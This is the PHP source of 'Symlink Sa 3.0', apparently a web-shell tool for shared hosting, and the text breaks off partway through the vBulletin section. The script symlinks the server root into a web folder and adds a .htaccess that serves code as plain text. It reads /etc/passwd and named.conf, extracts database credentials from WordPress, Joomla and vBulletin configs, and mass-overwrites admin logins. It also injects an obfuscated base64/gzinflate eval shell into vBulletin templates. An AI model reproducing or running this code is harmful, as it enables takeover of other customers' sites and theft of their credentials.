Symlink Sa 3.0

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
5. $u = explode("/",$pageURL );
6. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
7. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
8. $u = explode("/",$pageFTP );
9. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
10. ?>
11.   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
12.     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
13.  
14. <html xmlns="http://www.w3.org/1999/xhtml">
15.  
16. <head>
17. <title>Symlink_Sa 3.0</title>
18.  
19. <style type="text/css">
20.  
21.   html,body {
22.      margin: 0;
23.      padding: 0;
24.      outline: 0;
25. }
26. a{
27.  
28.  font-size: 13px;
29.  
30. }
31.  
32.  
33. body {
34.     direction: ltr;
35.     background-color:#F4F4F4;
36.     color: rgb(153, 153, 153);
37.     text-align: center
38. }
39.  
40.  
41.  
42. input,textarea,select{
43. font-weight: bold;
44. color: #000000;
45. }
46.  
47. input,textarea,select:hover{
48. box-shadow: 0px 0px 4px #AAAAAA;
49. }
50.  
51.  
52. .hedr {
53.   font-family: Tahoma, Arial, sans-serif  ;
54.   font-size: 22px;
55.  
56.  
57. }
58.  
59. .cont a{
60.  
61.  text-decoration: none;
62.  color:rgb(153, 153, 153);
63.  font-family: Tahoma, Arial, sans-serif  ;
64.  font-size: 16px;
65.  text-shadow: 0px 0px 3px ;
66. }
67.  
68. .cont a:hover{
69.  
70.  
71.   color: #EEEEEE ;
72.   text-shadow:0px 0px 3px #000000 ;
73.  
74.  
75. }
76.  
77. .tmp tr td{
78.  
79. border: solid 1px #BBBBBB;
80.  
81. padding: 2px ;
82.   font-size: 13px;
83. }
84.  
85. .tmp tr td a {
86.   text-decoration: none;
87.  
88.  
89.  
90. }
91.  
92. .foter{
93.   font-size: 9pt;
94.   color: #AAAAAA ;
95.   text-align: center
96. }
97.  
98. .tmp tr td:hover{
99.  
100. box-shadow: 0px 0px 4px #888888;
101.  
102. }
103. .fot{
104.  
105. font-family:Tahoma, Arial, sans-serif;
106.  
107.   font-size: 11pt;
108. }
109. .for a : hover{
110.  
111. text-shadow: 0px 0px 1px #3366FF;
112.  
113. }
114.  
115.  
116. .ir {
117.   color: #FF0000;
118. }
119.  
120.  
121.  
122. </style>
123.  
124. </head>
125.  
126. <body>
127.  
128. <div class='all'>
129.  
130.  
131. <?php
132.  
133. @mkdir('sym',0777);
134. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
135. $f =@fopen ('sym/.htaccess','w');
136. fwrite($f , $htcs);
137.  
138.  
139.  
140. @symlink("/","sym/root");
141.  
142. $pg = basename(__FILE__);
143.  
144. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
145.  
146. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
147.  
148. echo '<div class="cont">
149.  
150. [<a href="?"> Home </a>]
151.  
152. [<a href="?sws=sym"> User & Domains & Symlink </a>]
153.  
154. [<a href="?sws=sec"> Domains & Script </a>]
155.  
156. [ <a href="?sws=file"> Symlink File </a>]
157.  
158. [<a href="?sws=passwd"> Symlink Bypass </a>]
159.  
160. <br /><br />
161.  
162. [ <a href="?sws=read"> Bypass Read </a>]
163.  
164. [ <a href="?sws=joomla"> Mass Joomla </a>]
165.  
166. [ <a href="?sws=wp"> Mass WordPress </a>]
167.  
168. [ <a href="?sws=vb"> Mass vBulletin </a>]
169.  
170. [ <a href="?sws=help"> Help </a>]
171.  
172. <br /><br /><br />
173.  
174.  
175.  
176.  
177.  
178.  
179. </div>';
180.  
181. if(isset($_REQUEST['sws']))
182. {
183.  
184. switch ($_REQUEST['sws'])
185. {
186.  
187.  
188.  
189.  
190.  
191. /// Domains + Scripts  ///
192.  
193. case 'sec':
194.  
195. if(!@is_file('named.txt')){
196.  
197. $d00m = @file("/etc/named.conf");
198.  
199. }else{
200.  
201. $d00m = @file("named.txt");
202.  
203.  
204. }
205. if(!$d00m)
206. {
207.  
208.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
209. }
210. else
211.  
212. {
213. echo "<div class='tmp'>
214. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
215. foreach($d00m as $dom){
216.  
217. flush();
218. flush();
219.  
220.  
221.  
222. if(eregi("zone",$dom)){
223.  
224. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
225.  
226. flush();
227.  
228. if(@strlen(trim($domsws[1][0])) > 2){
229.  
230. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
231.  
232. ///////////////////////////////////////////////////////////////////////////////////
233.  
234. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
235. $wpp=@get_headers($wpl);
236. $wp=$wpp[0];
237.  
238. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
239. $wpp2=@get_headers($wp2);
240. $wp12=$wpp2[0];
241.  
242. ///////////////////////////////
243.  
244. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
245. $joo=@get_headers($jo1);
246. $jo=$joo[0];
247.  
248.  
249. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
250. $joo2=@get_headers($jo2);
251. $jo12=$joo2[0];
252.  
253. ////////////////////////////////
254.  
255. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
256. $vbb=@get_headers($vb1);
257. $vb=$vbb[0];
258.  
259. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
260. $vbb2=@get_headers($vb2);
261. $vb12=$vbb2[0];
262.  
263. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
264. $vbb3=@get_headers($vb3);
265. $vb13=$vbb3[0];
266.  
267. /////////////////
268.  
269. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
270. $whh2= @get_headers($wh1);
271. $wh=$whh2[0];
272.  
273. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
274. $whh2= @get_headers($wh2);
275. $wh12=$whh2[0];
276.  
277. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
278. $whh3= @get_headers($wh3);
279. $wh13=$whh3[0];
280.  
281. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
282. $whh5= @get_headers($wh5);
283. $wh15=$whh5[0];
284.  
285. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
286. $whh4= @get_headers($wh4);
287. $wh14=$whh4[0];
288.  
289.  
290.  
291. ////////////////////////////////////////////////////////////////////////////////
292.  
293.  ////////// Wordpress ////////////
294.  
295. $pos = strpos($wp, "200");
296. $config="&nbsp;";
297.  
298. if (strpos($wp, "200") == true )
299. {
300.  $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
301. }
302. elseif (strpos($wp12, "200") == true)
303. {
304.   $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
305. }
306.  
307. ///////////WHMCS////////
308.  
309. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
310. {
311.   $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
312.  
313. }
314. elseif (strpos($wh12, "200")  == true)
315. {
316.   $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
317. }
318.  
319. elseif (strpos($wh13, "200")  == true)
320. {
321.   $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
322.  
323. }
324.  
325. ///////// Joomla to 4 ///////////
326.  
327. elseif (strpos($jo, "200")  == true)
328. {
329.   $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
330. }
331.  
332. elseif (strpos($jo12, "200")  == true)
333. {
334.   $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
335. }
336.  
337. //////////vBulletin to 4 ///////////
338.  
339. elseif (strpos($vb, "200")  == true)
340. {
341.   $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
342. }
343.  
344. elseif (strpos($vb12, "200")  == true)
345. {
346.   $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
347. }
348.  
349. elseif (strpos($vb13, "200")  == true)
350. {
351.   $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
352. }
353.  
354. else
355. {
356.  continue;
357. }
358. flush();
359. flush();
360.  
361. /////////////////////////////////////////////////////////////////////////////////////
362.  
363.  
364.  
365. $site = $user['name'] ;
366.  
367.  
368.  
369. flush();
370.  
371. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
372. <td>".$config."</td></tr>"; flush();
373.  
374. }
375. }
376. }
377. }
378.  
379.  
380.  
381.  
382. break;
383.  
384.  
385. /// user + domine + symlink  ///
386.  
387. case 'sym':
388.  
389. if(!is_file('named.txt')){
390.  
391. $d00m = @file("/etc/named.conf");
392.  
393. }else{
394.  
395. $d00m = @file("named.txt");
396.  
397.  
398. }
399. if(!$d00m)
400. {
401.  
402.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
403. }
404. else
405.  
406. {
407. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
408. foreach($d00m as $dom){
409.  
410. if(eregi("zone",$dom)){
411.  
412. preg_match_all('#zone "(.*)"#', $dom, $domsws);
413.  
414. flush();
415.  
416. if(strlen(trim($domsws[1][0])) > 2){
417.  
418. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
419.  
420. flush();
421.  
422.  
423.  
424. $site = $user['name'] ;
425.  
426.  
427. @symlink("/","sym/root");
428.  
429. $site = $domsws[1][0];
430.  
431. $ir = 'ir';
432.  
433. $il = 'il';
434.  
435. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
436. {
437. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
438. }
439.  
440.  
441. echo "
442. <tr>
443.  
444. <td>
445. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
446. </td>
447.  
448.  
449. <td>
450. ".$user['name']."
451. </td>
452.  
453.  
454.  
455.  
456.  
457.  
458. <td>
459. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
460. </td>
461.  
462.  
463. </tr></div> ";
464.  
465.  
466. flush();
467. flush();
468.  
469. }
470. }
471. }
472. }
473.  
474.  
475.  
476.  
477. break;
478.  
479.  
480. /// file  symlink ///
481.  
482. case 'file':
483.  
484. echo'
485. The file path to symlink
486.  
487. <br /><br />
488. <form method="post">
489. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
490. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
491. <input type="submit" value="symlink" name="symlink" /> <br /><br />
492.  
493.  
494.  
495. </form>
496. ';
497.  
498. $pfile = $_POST['file'];
499. $symfile = $_POST['symfile'];
500. $symlink = $_POST['symlink'];
501.  
502. if ($symlink)
503. {
504.  
505.  
506. @mkdir('sym1',0777);
507. $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
508. $f =@fopen ('sym1/.htaccess','w');
509. @fwrite($f , $c);
510.  
511. @symlink("$pfile","sym1/$symfile");
512.  
513. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
514.  
515. }
516.  
517.  
518.  
519. break;
520.  
521. /// bypass read
522.  
523. case 'read':
524.  
525. echo "read /etc/named.conf";
526. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
527. flush();
528. flush();
529.  
530.  
531. $file = '/etc/named.conf';
532.  
533.  
534. $r3ad = @fopen($file, 'r');
535. if ($r3ad){
536. $content = @fread($r3ad, @filesize($file));
537. echo "".htmlentities($content)."";
538. }
539. else if (!$r3ad)
540. {
541. $r3ad = @show_source($file) ;
542. }
543. else if (!$r3ad)
544. {
545. $r3ad = @highlight_file($file);
546. }
547. else if (!$r3ad)
548. {
549. $sm = @symlink($file,'sym.txt');
550.  
551.  
552. if ($sm){
553. $r3ad = @fopen('sym/sym.txt', 'r');
554. $content = @fread($r3ad, @filesize($file));
555. echo "".htmlentities($content)."";
556.  
557. }
558. }
559.  
560.  
561.  
562. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
563.  
564.  
565. if(isset($_GET['save'])){
566.  
567.  
568. $cont = stripcslashes($_POST['file']);
569.  
570. $f = fopen('named.txt','w');
571.  
572. $w = fwrite($f,$cont);
573.  
574.                   if($w){
575.  
576.                   echo '<br />save has been successfully';
577.  
578.                   }
579.  
580. fclose($f);
581.  
582.  
583.  
584.  
585. }
586.  
587.  
588.  
589. break;
590.  
591. // passwd
592.  
593. case 'passwd':
594.  
595. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
596.  
597.  
598. $cont = stripcslashes($_POST['file']);
599.  
600. if(!file_exists('passwd.txt')){
601.  
602. $f = @fopen('passwd.txt','w');
603.  
604. $w = @fwrite($f,$cont);
605.  
606. fclose($f);
607. }
608. if($w or @filesize('passwd.txt') > 0){
609. // * SHOW * //
610.  
611. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
612. flush();
613.  
614. $fil3 = file('passwd.txt');
615.  
616. foreach ($fil3 as $f){
617.  
618.      $u=explode(':', $f);
619.      $user = $u['0'];
620.  
621.  
622.  
623. echo "
624. <tr>
625.  
626.  
627.  
628. <td width='15%'>
629. $user
630. </td>
631.  
632.  
633.  
634.  
635.  
636.  
637. <td width='10%'>
638. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
639. </td>
640.  
641. <td width='10%'>
642. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
643. </td>
644.  
645.  
646.  
647. </tr></div> ";
648.  
649.  
650. flush();
651. flush();
652.  
653.  
654. }
655.  
656.  
657.  
658.  
659.  
660.  
661. die ("</tr></div>");
662.  
663.  
664.                   }
665.  
666.  
667.  
668.  
669.  
670. }
671.  
672.  
673.  
674. echo "read /etc/passwd";
675. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
676. flush();
677.  
678. $file = '/etc/passwd';
679.  
680.  
681. $r3ad = @fopen($file, 'r');
682. if ($r3ad){
683. $content = @fread($r3ad, @filesize($file));
684. echo "".htmlentities($content)."";
685. }
686. elseif(!$r3ad)
687. {
688. $r3ad = @show_source($file) ;
689. }
690. elseif(!$r3ad)
691. {
692. $r3ad = @highlight_file($file);
693. }
694. elseif(!$r3ad)
695. {
696.  
697.                                             for($uid=0;$uid<1000;$uid++){
698.                                              $ara = posix_getpwuid($uid);
699.                                                if (!empty($ara)) {
700.                                                   while (list ($key, $val) = each($ara)){
701.                                                     print "$val:";
702.                                                   }
703.                                                   print "\n";
704.                                                  }
705.  
706.                                         }
707.  
708.  }
709.  
710.  
711. flush();
712.  
713.  
714. echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
715. flush();
716.  
717. break;
718.  
719.  
720.  
721. case 'joomla':
722.  
723. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
724.  
725.  
726. if(isset($_POST['s'])){
727.  
728. $file = @file_get_contents('joomla.txt');
729.  
730. $ex   = explode("\n",$file);
731.  
732. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
733. flush();
734.  
735.  
736. foreach ($ex as $exp){
737.  
738. $es   = explode("||",$exp);
739.  
740. $config = $es[0];
741.  
742. $domin = $es[1];
743.  
744. $domins = trim($domin).'';
745.  
746. $readconfig  = @file_get_contents(trim($config));
747.  
748. if(ereg('JConfig',$readconfig)){
749.  
750.  
751.  
752. $pass    =  ex($readconfig,'$password = \'',"';");
753.  
754. $userdb  =  ex($readconfig,'$user = \'',"';");
755.  
756. $db      =  ex($readconfig,'$db = \'',"';");
757.  
758. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
759.  
760. $tab     =  $fix.'users';
761.  
762.  
763. $con     = @mysql_connect('localhost',$userdb,$pass);
764.  
765. $db      = @mysql_select_db($db,$con);
766.  
767. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");
768.  
769.  
770. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
771.  
772.  
773. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
774.  
775. $domins = trim($domin).'';
776.  
777. echo "<tr>
778. <td><a target='_blank' href='http://$domins'>$domin</a></td>
779. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
780. flush();
781.  
782.  
783.  
784. }else{
785.  
786. echo "<tr>
787. <td><a target='_blank' href='http://$domins'>$domin</a></td>
788. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
789. flush();
790.  
791. }
792.  
793. }
794.  
795.  
796.  
797.  
798.  
799.  
800.  
801.  
802.  
803. die();
804.  
805. }
806.  
807. if(!is_file('named.txt')){
808.  
809. $d00m = @file("/etc/named.conf");
810.  
811. flush();
812.  
813.  
814. }else{
815.  
816. $d00m = file("named.txt");
817.  
818.  
819. }
820. if(!$d00m)
821. {
822.  
823.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
824. }
825. else
826.  
827. {
828. echo "<div class='tmp'>
829. <form method='POST' action='$pg?sws=joomla'>
830. <input type='submit' value='Mass ching Admin' />
831. <input type='hidden' value='1' name='s' />
832. </form><br /><br />
833. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
834.  
835. $f = fopen('joomla.txt','w');
836.  
837. foreach($d00m as $dom){
838.  
839. if(eregi("zone",$dom)){
840.  
841. preg_match_all('#zone "(.*)"#', $dom, $domsws);
842.  
843. if(strlen(trim($domsws[1][0])) > 2){
844.  
845. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
846.  
847. ///////////////////////////////////////////////////////////////////////////////////
848.  
849. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
850. $wpp=get_headers($wpl);
851. $wp=$wpp[0];
852.  
853. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
854. $wpp2=get_headers($wp2);
855. $wp12=$wpp2[0];
856.  
857. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
858. $wpp3=get_headers($wp3);
859. $wp13=$wpp3[0];
860.  
861.  
862.  ////////// joomla ////////////
863.  
864. $pos = strpos($wp, "200");
865. $config="&nbsp;";
866.  
867. if (strpos($wp, "200") == true )
868. {
869.  $config= $wpl;
870. }
871. elseif (strpos($wp12, "200") == true)
872. {
873.   $config= $wp2;
874. }
875. elseif (strpos($wp13, "200") == true)
876. {
877.   $config= $wp3;
878. }
879. else
880. {
881. continue;
882.  
883. }
884. flush();
885.  
886. /////////////////////////////////////////////////////////////////////////////////////
887.  
888. $dom = $domsws[1][0];
889.  
890. $w = fwrite($f,"$config||$dom \n");
891. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
892.  
893.  
894. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
895. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
896.  
897.  
898.  
899.  
900.  
901. flush();
902.  
903.  
904. }
905. }
906. }
907. }
908.  
909.  
910. break;
911.  
912. case 'wp':
913.  
914. ############################ index #########################3
915.  
916.  
917.  
918.  
919.  
920.  
921. ########  admin ##########33
922.  
923. if(isset($_POST['s'])){
924.  
925. $file = @file_get_contents('wp.txt');
926.  
927. $ex   = explode("\n",$file);
928.  
929. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
930. flush();
931. flush();
932.  
933.  
934. foreach ($ex as $exp){
935.  
936. $es   = explode("||",$exp);
937.  
938. $config = $es[0];
939.  
940. $domin = $es[1];
941.  
942. $domins = trim($domin).'';
943.  
944. $readconfig  = @file_get_contents(trim($config));
945.  
946. if(ereg('wp-settings.php',$readconfig)){
947.  
948.  
949.  
950. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
951.  
952. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
953.  
954. $db      =  ex($readconfig,"define('DB_NAME', '","');");
955.  
956. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
957.  
958. $tab     = $fix.'users';
959.  
960. $con     = @mysql_connect('localhost',$userdb,$pass);
961.  
962. $db      = @mysql_select_db($db,$con);
963.  
964. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
965.  
966. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
967.  
968.  
969.  
970. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
971.  
972. else
973.  
974. {
975.  
976. $r = '<b style="color:red">failed</b>';
977.  
978. }
979.  
980. $domins = trim($domin).'';
981.  
982. echo "<tr>
983. <td><a target='_blank' href='http://$domins'>$domin</a></td>
984. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
985.  
986. flush();
987. flush();
988.  
989.  
990.  
991.  
992.  
993.  
994. }else{
995.  
996. echo "<tr>
997. <td><a target='_blank' href='http://$domins'>$domin</a></td>
998. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
999.  
1000. flush();
1001. flush();
1002.  
1003. }
1004.  
1005. }
1006.  
1007.  
1008.  
1009.  
1010.  
1011.  
1012.  
1013.  
1014.  
1015.  
1016. die();
1017.  
1018. }
1019.  
1020. if(!is_file('named.txt')){
1021.  
1022. $d00m = @file("/etc/named.conf");
1023.  
1024. }else{
1025.  
1026. $d00m = @file("named.txt");
1027.  
1028.  
1029. }
1030. if(!$d00m)
1031. {
1032.  
1033.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
1034. }
1035. else
1036.  
1037. {
1038. echo "<div class='tmp'>
1039. <form method='POST' action='$pg?sws=wp'>
1040. <input type='submit' value='Mass Change Admin' />
1041. <input type='hidden' value='1' name='s' />
1042. </form>
1043. <br /><br />
1044. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
1045.  
1046. flush();
1047. flush();
1048.  
1049. $f = fopen('wp.txt','w');
1050.  
1051. foreach($d00m as $dom){
1052.  
1053. if(eregi("zone",$dom)){
1054.  
1055. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1056.  
1057. if(strlen(trim($domsws[1][0])) > 2){
1058.  
1059. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1060.  
1061. ///////////////////////////////////////////////////////////////////////////////////
1062.  
1063. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
1064. $wpp=get_headers($wpl);
1065. $wp=$wpp[0];
1066.  
1067. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
1068. $wpp2=get_headers($wp2);
1069. $wp12=$wpp2[0];
1070.  
1071. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
1072. $wpp3=get_headers($wp3);
1073. $wp13=$wpp3[0];
1074.  
1075.  
1076.  ////////// wp ////////////
1077.  
1078. $pos = strpos($wp, "200");
1079. $config="&nbsp;";
1080.  
1081. if (strpos($wp, "200") == true )
1082. {
1083.  $config= $wpl;
1084. }
1085. elseif (strpos($wp12, "200") == true)
1086. {
1087.   $config= $wp2;
1088. }
1089. elseif (strpos($wp13, "200") == true)
1090. {
1091.   $config= $wp3;
1092. }
1093. else
1094. {
1095. continue;
1096.  
1097. }
1098. flush();
1099.  
1100. /////////////////////////////////////////////////////////////////////////////////////
1101.  
1102. $dom = $domsws[1][0];
1103.  
1104. $w = fwrite($f,"$config||$dom \n");
1105. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
1106.  
1107.  
1108. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
1109. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
1110. flush();
1111. flush();
1112.  
1113.  
1114.  
1115.  
1116.  
1117. flush();
1118.  
1119.  
1120. }
1121. }
1122. }
1123. }
1124.  
1125.  
1126. break;
1127.  
1128.  
1129. case 'vb':
1130.  
1131.  
1132. if(isset($_POST['s'])){
1133.  
1134.  
1135.  
1136. $file = @file_get_contents('vb.txt');
1137.  
1138. $ex   = explode("\n",$file);
1139.  
1140. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
1141.  
1142.  
1143. foreach ($ex as $exp){
1144.  
1145. $es   = explode("||",$exp);
1146.  
1147. $config = $es[0];
1148.  
1149. $domin = $es[1];
1150.  
1151. $domins = trim($domin).'';
1152.  
1153. $readconfig  = @file_get_contents(trim($config));
1154.  
1155. if(ereg('vBulletin',$readconfig)){
1156.  
1157.  
1158.  
1159. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
1160.  
1161. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
1162.  
1163. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
1164.  
1165. $con     = @mysql_connect('localhost',$userdb,$pass);
1166.  
1167. $db      = @mysql_select_db($db,$con);
1168.  
1169. $shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
1170.  
1171. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
1172.  
1173. $crypt .= "$shell";
1174.  
1175. $crypt .= "\')))}}{\${exit()}}</textarea>";
1176.  
1177. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
1178.  
1179. $query  = @mysql_query($sqlfaq,$con);
1180.  
1181.  
1182.  
1183. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
1184.  
1185. else
1186.  
1187. {
1188.  
1189. $r = '<b style="color:red">failed</b>';
1190.  
1191. }
1192.  
1193. $domins = trim($domin).'';
1194.  
1195. echo "<tr>
1196. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1197. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
1198.  
1199.  
1200.  
1201.  
1202.  
1203.  
1204.  
1205. }else{
1206.  
1207. echo "<tr>
1208. <td><a target='_blank' href='http://$domins'>$domin</a></td>
1209. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
1210. }
1211.  
1212. }
1213.  
1214.  
1215.  
1216.  
1217.  
1218.  
1219.  
1220.  
1221.  
1222.  
1223. die();
1224.  
1225. }
1226.  
1227. if(!is_file('named.txt')){
1228.  
1229. $d00m = file("/etc/named.conf");
1230.  
1231. }else{
1232.  
1233. $d00m = file("named.txt");
1234.  
1235.  
1236. }
1237. if(!$d00m)
1238. {
1239.  
1240.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
1241. }
1242. else
1243.  
1244. {
1245. echo "<div class='tmp'>
1246. <form method='POST' action='$pg?sws=vb'>
1247. <input type='submit' value='Inject shell' />
1248. <input type='hidden' value='1' name='s' />
1249. </form>
1250. <br /><br />
1251. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
1252.  
1253. $f = fopen('vb.txt','w');
1254.  
1255. foreach($d00m as $dom){
1256.  
1257. if(eregi("zone",$dom)){
1258.  
1259. preg_match_all('#zone "(.*)"#', $dom, $domsws);
1260.  
1261. if(strlen(trim($domsws[1][0])) > 2){
1262.  
1263. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
1264.  
1265. ///////////////////////////////////////////////////////////////////////////////////
1266.  
1267. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
1268. $wpp=get_headers($wpl);
1269. $wp=$wpp[0];
1270.  
1271. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
1272. $wpp2=get_headers($wp2);
1273. $wp12=$wpp2[0];
1274.  
1275. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
1276. $wpp3=get_headers($wp3);
1277. $wp13=$wpp3[0];
1278.  
1279.  
1280.  ////////// vb ////////////
1281.  
